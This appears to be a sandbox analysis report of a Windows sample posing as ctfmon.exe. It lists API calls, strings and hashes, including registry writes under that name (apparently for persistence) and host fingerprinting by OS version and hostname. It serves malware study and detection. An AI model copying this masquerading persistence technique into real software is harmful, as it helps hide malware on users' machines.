Windows 7, xrefs: 00403405
Windows 2000, xrefs: 004034D4
Windows Server 2008 R2, xrefs: 0040340F
Windows Home Server, xrefs: 00403485
%d.%d.%d.%d, xrefs: 004032B3
<`/#v, xrefs: 004031C5
<, xrefs: 00403229
Windows Server 2003 R2, xrefs: 0040346C

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Version$ComputerNameTimegethostbynamegethostnametime
String ID: SP%d$%3dD:%2dH:%2dM$%d.%d.%d.%d$<$<`/#v$Windows 2000$Windows 7$Windows 8$Windows Home Server$Windows Server 2003$Windows Server 2003 R2$Windows Server 2008$Windows Server 2008 R2$Windows Server 2012$Windows Vista$Windows XP$Windows XP Professional x64
API String ID: 855337075-699715364
Opcode ID: 2f141a5107b3ccbad37aa88038b1529af5405a533d7e69f40edc7eec3bde9742
Instruction ID: bdf93ca89eb0b6f63a75df1cd038082309c9780f61bd84f6bf5dbb40301ebfc2
Opcode Fuzzy Hash: 2f141a5107b3ccbad37aa88038b1529af5405a533d7e69f40edc7eec3bde9742
Instruction Fuzzy Hash: E4A1C731608345ABC724CE24C8406AFBBE6AFC5310F544A3EF549DB3D0DB78DA49875A

Function 00404620 Relevance: 43.9, APIs: 8, Strings: 17, Instructions: 189
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 0040468A

Part of subcall function 004248AD: lstrlenA.KERNEL32(004058A3,?,?,?,004058A3,?), ref: 004248BB

WideCharToMultiByte.KERNEL32(00000000,00000000,76945540,?,?,00000104,00000000,00000000,00000022,00000000), ref: 004046C0
RegOpenKeyExA.KERNEL32(80000001,0000001D,00000000,000F003F,?), ref: 004047D1
GetLastError.KERNEL32 ref: 004047D9
RegQueryValueExA.KERNEL32(0000001D,ctfmon.exe,00000000,00000000,00000000,00000104), ref: 00404811
RegCloseKey.ADVAPI32(?), ref: 00404825
RegSetValueExA.KERNEL32(?,ctfmon.exe,00000000,00000001,?,0000001C), ref: 00404893
RegCloseKey.KERNEL32(?), ref: 0040489E

Strings

', xrefs: 00404704
;, xrefs: 00404752
;, xrefs: 0040479A
9, xrefs: 0040473F
+, xrefs: 0040477A
', xrefs: 00404788
=, xrefs: 00404744
=, xrefs: 00404716
:, xrefs: 00404724
(, xrefs: 0040471F
*, xrefs: 00404736
', xrefs: 0040472D
:, xrefs: 00404768
ctfmon.exe, xrefs: 0040480B, 0040488D
+, xrefs: 0040475F
-, xrefs: 00404709
=, xrefs: 00404783

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CloseValue$ByteCharCommandErrorLastLineMultiOpenQueryWidelstrlen
String ID: '$'$'$($*$+$+$-$9$:$:$;$;$=$=$=$ctfmon.exe
API String ID: 3300019627-3918993357
Opcode ID: 037b884ea22887e435eb3aae53bc3090eac85484e3f03d1bbe25e0e0285c6335
Instruction ID: aab2ec02df40a054bcdff1db174f22e23601e58f66f7115433a06adc50c1c808
Opcode Fuzzy Hash: 037b884ea22887e435eb3aae53bc3090eac85484e3f03d1bbe25e0e0285c6335
Instruction Fuzzy Hash: 9D814B7120D3C0DED322CB689888B9FBFD4ABE6308F48495DF1D557282C6B99509C767

Function 00404150 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 324
sleepfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,0007A120,00001000,00000004), ref: 0040416F
VirtualAlloc.KERNEL32(00000000,00080000,00001000,00000004), ref: 00404182
Sleep.KERNEL32(00001388), ref: 004041B1
WaitForSingleObject.KERNEL32(00000334,00007530), ref: 0040422D
ResetEvent.KERNEL32(00000334), ref: 0040423A
SetEvent.KERNEL32(00000334), ref: 0040426F
Sleep.KERNEL32(000003E8), ref: 0040427A
CreateFileW.KERNEL32(0053CDF8,10000000,00000003,00000000,00000003,00000000,00000000), ref: 004042BB
CreateFileW.KERNEL32(0053CDF8,10000000,00000001,00000000,00000003,00000000,00000000), ref: 004042DC

Part of subcall function 00402F20: WaitForSingleObject.KERNEL32(00000338,000000FF,?,?,0053CB68,00403D13,?,00000049), ref: 00402F3E
Part of subcall function 00402F20: ResetEvent.KERNEL32(00000338,?,0053CB68,00403D13,?,00000049), ref: 00402F47
Part of subcall function 00402F20: SetEvent.KERNEL32(0000033C,?,0053CB68,00403D13,?,00000049), ref: 00402F77
Part of subcall function 00402F20: WaitForSingleObject.KERNEL32(0000033C,00000064,?,0053CB68,00403D13,?,00000049), ref: 00402F88
Part of subcall function 00402F20: Sleep.KERNEL32(0000000A,?,0053CB68,00403D13,?,00000049), ref: 00402F93
Part of subcall function 00402F20: SetEvent.KERNEL32(00000338,?,0053CB68,00403D13,?,00000049), ref: 00402F9E

SetEvent.KERNEL32(00000334), ref: 00404393
Sleep.KERNEL32(000003E8), ref: 0040439E
GetFileSize.KERNEL32(00000000,?), ref: 004043AF
SetFilePointer.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,0007A120,00000000), ref: 004043DE
ReadFile.KERNEL32(00000000,?,0007A120,?,00000000), ref: 004043F5
CloseHandle.KERNEL32(00000000), ref: 004043FC
SetEvent.KERNEL32 ref: 004044ED
Sleep.KERNEL32(000000C8,?,00000334), ref: 0040457D

Strings

+*&=^^^^--------DW+ER, xrefs: 0040430E
+*&=^^^^--------DWRST, xrefs: 004041DD
+*&=^^^^--------DW+FI, xrefs: 00404433

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Event$FileSleep$ObjectSingleWait$AllocCreateResetVirtual$CloseHandlePointerReadSize
String ID: +*&=^^^^--------DW+ER$+*&=^^^^--------DW+FI$+*&=^^^^--------DWRST
API String ID: 72173714-2046355071
Opcode ID: 03ec659664103a2cae5422131a5bfd8373ece3637d9f973c933879326cef5ca2
Instruction ID: 68a225615deaf7f64b5cd94b1301c96557090b2748eeb4ce9f12d3137a3e3624
Opcode Fuzzy Hash: 03ec659664103a2cae5422131a5bfd8373ece3637d9f973c933879326cef5ca2
Instruction Fuzzy Hash: C1C1AE71A04704AFD714DF24EC84A1BBBE5FBD8700F40492DFA45AB390DB78A909CBA5

Function 00421EF2 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00428C05: TlsGetValue.KERNEL32(0053F118,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000), ref: 00428C44

CallNextHookEx.USER32(?,00000003,?,?), ref: 00421F1F
GetWindowLongW.USER32(?,000000FC), ref: 00421F5E
GetPropW.USER32(?,AfxOldWndProc423), ref: 00421F72
SetPropW.USER32(?,AfxOldWndProc423,00000003), ref: 00421F81
GetPropW.USER32(?,AfxOldWndProc423), ref: 00421F89
GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 00421F95
SetWindowLongW.USER32(?,000000FC,Function_00021E76), ref: 00421FAF
CallNextHookEx.USER32(?,00000003,?,?), ref: 00421FBE
UnhookWindowsHookEx.USER32(?), ref: 00421FCF
GetWindowLongW.USER32(?,000000FC), ref: 0042203F
SetWindowLongW.USER32(?,000000FC,00000000), ref: 00422060
SetWindowLongW.USER32(?,000000FC,00000000), ref: 00422085

Strings

AfxOldWndProc423, xrefs: 00421F6B, 00421F70, 00421F7F, 00421F87, 00421F94

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: LongWindow$HookProp$CallNext$AtomGlobalUnhookValueWindows
String ID: AfxOldWndProc423
API String ID: 3289694481-1060338832
Opcode ID: 4f8fdded97969e7e628b20d6936dbd8aea49f7f8fcba6dacbe31f97343f7c436
Instruction ID: 3bbe1058c676c252dc3c84ad706e6ee6a953ffd8e3112ba2f7a94efb76d52b7d
Opcode Fuzzy Hash: 4f8fdded97969e7e628b20d6936dbd8aea49f7f8fcba6dacbe31f97343f7c436
Instruction Fuzzy Hash: B3518131700124EBCB219F65ED88BAE7B74FF19750F61816AFD159A2A1C7788A01CB98

Function 004238E8 Relevance: 19.7, APIs: 13, Instructions: 174
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E

GetParent.USER32(?), ref: 00423913
SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 00423936
GetWindowRect.USER32(?,?), ref: 0042394F
GetWindowLongW.USER32(00000000,000000F0), ref: 00423962
CopyRect.USER32(?,?), ref: 004239AF
CopyRect.USER32(?,?), ref: 004239B9
GetWindowRect.USER32(00000000,?), ref: 004239C2

Part of subcall function 00405B9B: MonitorFromWindow.USER32(?,?), ref: 00405BB0

Part of subcall function 00405C06: GetMonitorInfoW.USER32(?,?), ref: 00405C1D

CopyRect.USER32(?,?), ref: 004239DE

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: RectWindow$Copy$LongMonitor$FromInfoMessageParentSend
String ID:
API String ID: 1450647913-0
Opcode ID: 15dfc4db7a0cb69fc378f0b22d4e2ecb498fe7f2055ab953c55b9b74ad9f47fe
Instruction ID: ccb8daffb7cbfa52e4fbfdfbb8d48ca0ec0013079dd18dece64f2212521eac76
Opcode Fuzzy Hash: 15dfc4db7a0cb69fc378f0b22d4e2ecb498fe7f2055ab953c55b9b74ad9f47fe
Instruction Fuzzy Hash: 9151A671B00229AFDB10DFA8EC85EEEB7B9AF44314F544166F501F3280D678EE458B58

Function 0042102B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00421030
GetSystemMetrics.USER32(0000002A), ref: 004210E2
GlobalLock.KERNEL32(?), ref: 0042116C
CreateDialogIndirectParamW.USER32(?,?,?,Function_00020E73,00000000), ref: 0042119E

Part of subcall function 00424739: InterlockedDecrement.KERNEL32(?), ref: 0042474D

DestroyWindow.USER32(00000000,?,?,00000000,?,?), ref: 00421215
GlobalUnlock.KERNEL32(?), ref: 00421226
GlobalFree.KERNEL32(?), ref: 0042122F

Strings

MS Shell Dlg, xrefs: 004210F0
Helv, xrefs: 00421116
MS Sans Serif, xrefs: 00421103

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
String ID: Helv$MS Sans Serif$MS Shell Dlg
API String ID: 2343056566-2894235370
Opcode ID: 55db1a83fbba52e5acfeb541132f7c990a34733976cc85534da73b1da14e8790
Instruction ID: 7206d5c3c7dbf20e32f5d3ed2ca5f4a347ebefc87342b6247bb12fda8d74ee15
Opcode Fuzzy Hash: 55db1a83fbba52e5acfeb541132f7c990a34733976cc85534da73b1da14e8790
Instruction Fuzzy Hash: D7619471B00269DFCF10DFA4E8859BEBBB1BF18304F60046FF501A22A1D7785A51CB59

Function 00421D17 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00421D1C
GetPropW.USER32(?,AfxOldWndProc423), ref: 00421D34
CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 00421D92

Part of subcall function 00421924: GetWindowRect.USER32(?,00421B1C), ref: 00421949
Part of subcall function 00421924: GetWindow.USER32(?,00000004), ref: 00421966

SetWindowLongW.USER32(?,000000FC,?), ref: 00421DC2
RemovePropW.USER32(?,AfxOldWndProc423), ref: 00421DCA
GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 00421DD1
GlobalDeleteAtom.KERNEL32(00000000), ref: 00421DD8

Part of subcall function 00421901: GetWindowRect.USER32(?,?), ref: 0042190D

CallWindowProcW.USER32(?,?,?,?,00000000), ref: 00421E2C

Strings

AfxOldWndProc423, xrefs: 00421D2A, 00421D32, 00421DC8, 00421DD0

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: f1274f229b79a40cf399756ccfc4787f1cda9d8cf99687d665b758292b2d2fba
Instruction ID: ee617ac9c7a8cbdd772955139c2c3f47372abafb9f4b2e415b0651597c7a1178
Opcode Fuzzy Hash: f1274f229b79a40cf399756ccfc4787f1cda9d8cf99687d665b758292b2d2fba
Instruction Fuzzy Hash: 1831A572A0012ABBCF119FE5ED49DFF7B78EF55311F40042AF901A2160C7394A21D7A9

Function 0042889E Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(0053F134,0053EDA8,00000000,?,0053F118,0053F118,00428C39,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000), ref: 004288AD
GlobalAlloc.KERNEL32(00002002,00000000,?,?,0053F118,0053F118,00428C39,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000), ref: 00428902
GlobalHandle.KERNEL32(0056B508), ref: 0042890B
GlobalUnlock.KERNEL32(00000000), ref: 00428914
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 00428926
GlobalHandle.KERNEL32(0056B508), ref: 0042893D
GlobalLock.KERNEL32(00000000), ref: 00428944
LeaveCriticalSection.KERNEL32(0040D108,?,?,0053F118,0053F118,00428C39,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000), ref: 0042894A
GlobalLock.KERNEL32(00000000), ref: 00428959
LeaveCriticalSection.KERNEL32(?), ref: 004289A2

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: 94baa74e74d1816e201a8b95c87ab1cee1c36e3339597553a40441d4cb95e4e8
Instruction ID: 271864d7abaf63b675c0f0faa4b004931e40b10b77f41b95d7dd058722d16705
Opcode Fuzzy Hash: 94baa74e74d1816e201a8b95c87ab1cee1c36e3339597553a40441d4cb95e4e8
Instruction Fuzzy Hash: 1E318EB17007099FD7249F28EC89A2EB7E9FF44304B440A2EF952C3661EB75E855CB54

Function 0042131A Relevance: 13.6, APIs: 9, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0042131F
FindResourceW.KERNEL32(?,00000000,00000005,?,?,?,?,?,?,?,?,00000000), ref: 00421357
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0042135F

Part of subcall function 004220E2: UnhookWindowsHookEx.USER32(?), ref: 00422107

LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0042136C
IsWindowEnabled.USER32(?), ref: 0042139F
EnableWindow.USER32(?,00000000), ref: 004213AD
EnableWindow.USER32(?,00000001), ref: 0042143B
GetActiveWindow.USER32 ref: 00421446
SetActiveWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00421454

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 401145483-0
Opcode ID: ee2693152e6010e6e9c47a675b8d66676a5692f735b3e3edcbf4436643e90683
Instruction ID: 784f444dc76e6990419508fd16e063a3552bb93fd24097b854aee613197a0977
Opcode Fuzzy Hash: ee2693152e6010e6e9c47a675b8d66676a5692f735b3e3edcbf4436643e90683
Instruction Fuzzy Hash: 9B41C030B00A24DBDB21AB65E885A7FB7B5FF54705F90011BF902A22A1CB798941CA69

Function 00423C3C Relevance: 10.6, APIs: 7, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetParent.USER32(?), ref: 00423C70
PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00423C99
UpdateWindow.USER32(?), ref: 00423CB5
SendMessageW.USER32(?,00000121,00000000,?), ref: 00423CDB
SendMessageW.USER32(?,0000036A,00000000,00000001), ref: 00423CFA
UpdateWindow.USER32(?), ref: 00423D3D
PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00423D70

Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 695136d32d4e6256ec9fe47706e3780479ec0c08abf10bb3384cb61ea45ff5e8
Instruction ID: 2835e03b91a28ba3af01524857fe71f7bc2e9977fd44adc23a2fdb3f1163188a
Opcode Fuzzy Hash: 695136d32d4e6256ec9fe47706e3780479ec0c08abf10bb3384cb61ea45ff5e8
Instruction Fuzzy Hash: BE418F307047519BD731DF26A848A2BBBF8EFC4B46F90091EF48196251C77DDA05CA9A

Function 00401240 Relevance: 9.1, APIs: 6, Instructions: 91
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMenu.USER32(?,00000000,?,?,?,?,0042AFB8,000000FF), ref: 00401265
AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 004012B3
AppendMenuW.USER32(?,00000000,00000010,?), ref: 004012C2
SendMessageW.USER32(?,00000080,00000001,?), ref: 004012EB
SendMessageW.USER32(?,00000080,00000000,?), ref: 004012FC
CreateThread.KERNEL32(00000000,00000000,Function_000014B0,00000000,00000000,00000000), ref: 0040133B

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Menu$AppendMessageSend$CreateSystemThread
String ID:
API String ID: 74173811-0
Opcode ID: d8992fad20af1a923786e3dc5bba175c898580a51614293c88c1d127db3c23c6
Instruction ID: 1d9806d43d84ee879c0bed757a7013bebe0408e528fbc722d7d59c404b59acd4
Opcode Fuzzy Hash: d8992fad20af1a923786e3dc5bba175c898580a51614293c88c1d127db3c23c6
Instruction Fuzzy Hash: E0215375340700BBE230DB55DC82F1AF7A4EB84B10F508A1EB6556B2D0CAB8F8058B59

Function 00424D98 Relevance: 9.0, APIs: 6, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(0000000B), ref: 00424DA5
GetSystemMetrics.USER32(0000000C), ref: 00424DAC
GetDC.USER32(00000000), ref: 00424DC5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00424DD6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00424DDE
ReleaseDC.USER32(00000000,00000000), ref: 00424DE6

Part of subcall function 00428FF4: GetSystemMetrics.USER32(00000002), ref: 00429006
Part of subcall function 00428FF4: GetSystemMetrics.USER32(00000003), ref: 00429010

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
String ID:
API String ID: 1031845853-0
Opcode ID: 1b7e95f1daaaf1ad890cb9b11a4611629987d7c9efd1284042aeb5d660bc9662
Instruction ID: 1a237f0f63429e1a6939c80a8fc9a6691efaff51cb6deb2a72a08bbb0bfadc6e
Opcode Fuzzy Hash: 1b7e95f1daaaf1ad890cb9b11a4611629987d7c9efd1284042aeb5d660bc9662
Instruction Fuzzy Hash: 8EF03670740710AEE2306B769C89F1B77A4EF90795F51452EE601572D0CAB898468AA9

Function 004158E8 Relevance: 6.2, APIs: 4, Instructions: 241
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000001,80000000,?,0000000C,00000001,00000080,00000000,00000001,00000000,00000000), ref: 00415A9B
GetLastError.KERNEL32 ref: 00415AA7
GetFileType.KERNEL32(00000000), ref: 00415ABC
CloseHandle.KERNEL32(00000000), ref: 00415AC7

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
